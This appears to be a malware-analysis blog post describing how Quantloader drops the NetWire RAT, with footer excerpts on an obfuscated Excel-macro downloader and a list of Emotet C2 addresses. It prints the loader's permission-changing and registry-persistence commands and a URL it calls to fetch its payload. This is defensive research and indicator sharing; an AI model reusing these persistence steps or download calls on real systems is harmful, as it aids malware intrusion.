Skip to main content

Quantloader serving NetWire RAT

Follow the C2i tracker for block-lists. 


Here’s a look at what good old Quant is serving at this time:



Most of the modus operandi is same old — firewall rules, new processes etc.
There isn’t much effort to hide:



Haven’t looked at it much since I published this on MalwareBytes blog but here are a few things its still doing:
“cmd /c echo Y|CACLS \”c:\\users\\rem\\appdata\\roaming\\92804119\\dwm.exe\” /P \”REM:R\””
Some good old registry tampering:
“HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run [7]”



Trick to write into the registry:
0061FE34 0040C8C8 “regini C:\\Users\\REM\\AppData\\Local\\Temp\\per”
It is using this file that’s created ‘per’ to write the contents into the registry.
0060FE34  |0040B388; |CommandLine = "regini C:\Users\REM\AppData\Local\Temp\per"
In order to write it, it used regini.exe with the above commandline. ‘Per’ is just a txt file.



And after the registry entry has been written, it deletes ‘per’.
0060FECC  [0040265E  ^&@   ; /RETURN from KERNEL32.DeleteFileA to fad.0040265E
0060FED0  /00408170  p@   ; \Name = "C:\Users\REM\AppData\Local\Temp\per"
And here’s the call for the final executable:
0061FED0 00408B90 “http://user6097.com/q/index.php?id=92804119&c=1&mk=b58959&il=H&vr=1.73&bt=64"
The executable is not there anymore at the time of this publication but all my OSINT resources point to it being:
NetWire RAT
f7e5be410ed0d52889685b8376f1429e
Labels:

Comments

Post a Comment

Popular posts from this blog

Grinju Downloader: Anti-analysis (on steroids) | Part 2

  This malware takes anti-analysis and stealth techniques to a new level We took a look at this malware in the Part 1 of this publication. Now let’s carry on with the analysis and dig deeper into the various anti-analysis and stealth-exec features of this malware in Part2. Malpedia Inventory: https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju Secondary Macro Code First of all, here’s the entire code that is dumped in the sheet once all the macro functions have been completed. Take a look at these lines and try to figure out what they are meant to do. Then we’ll take a look at the most important of these briefly before moving on to the next section. =CLOSE(FALSE) =FORMULA(LEN(APP.MAXIMIZE())+-459,Sheet1!R18690C129) =FORMULA(LEN(GET.WINDOW(7))+-131,Sheet1!R18691C129) =FORMULA(LEN(GET.WINDOW(20))+-893,Sheet1!R18692C129) =FORMULA(LEN(GET.WINDOW(23)=3)+433,Sheet1!R18693C129) =FORMULA(LEN(GET.WORKSPACE(31))+864,Sheet1!R18694C129) =FORMULA(LEN(GET.WORKSPACE(13)>770)+...
Post a Comment
Read more

Grinju Downloader: Anti-analysis (on steroids) | Part 1

  This malware takes anti-analysis and stealth techniques to a new level Malpedia Inventory: https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju I’ve come across some great anti-analysis code in malware over the years. This one takes the top spot. On that note, let’s get into it, this is a long one! Since this malware employs a very complex structure, I’ve decided to divide the analysis into different sections. I’ll try to keep it as simple as possible but having said that, it really is a very complicated project. Hence, publishing in parts. TLDR: This is a very well-thought and equally well-written malware. There’s no VBA that you can analyse. The values and formulas that are used are spread across the worksheets to thousands of rows. The functions, among other things, are used to close the file, corrupt it and also delete the dropped scripts to make analysis extremely hard. In fact, you cannot analyse this malware without altering the code it self. Along the way, you’ll a...
Post a Comment
Read more

Emotet C2 Network IOC September 2018 Week 1 Campaign

IP Port Country State City 184.191.59.24 United States Texas Padre Island Ntl Seashor 98.5.202.134 United States Washington Bainbridge Island 174.64.65.21 United States Kansas Park 62.75.143.128 Switzerland Geneve 199.119.78.38 443 United States Missouri Springfield 95.141.175.240 443 Netherlands Diemen 130.180.10.18 United States Virginia Virginia Beach 85.100.125.179 443 Germany Nordrhein-westfalen Huerth 118.244.214.210 Korea, Republic Of Seoul 63.141.2.116 8443 United States Virginia Ashburn 157.7.164.23 Thailand 81.151.15.109 8443 Spain Barcelona Barcelona 199.119.78.23 United States Missouri Springfield 216.74.200.97 United States South Carolina Rock Hill 190.86.177.157 7080 Argentina Buenos Aires 85.246.79.84 Spain Madrid Madrid 211.115.111.19 443 Australia New South Wales Sydney 106.187.52.135 China Tianjin 105.184.68.110 8080 Egypt 84.200.106.120 8080 Turkey Istanbul 199.119.78.9 443 United States Missouri Springfield 69.198.17.7 Canada British Colum...
Post a Comment
Read more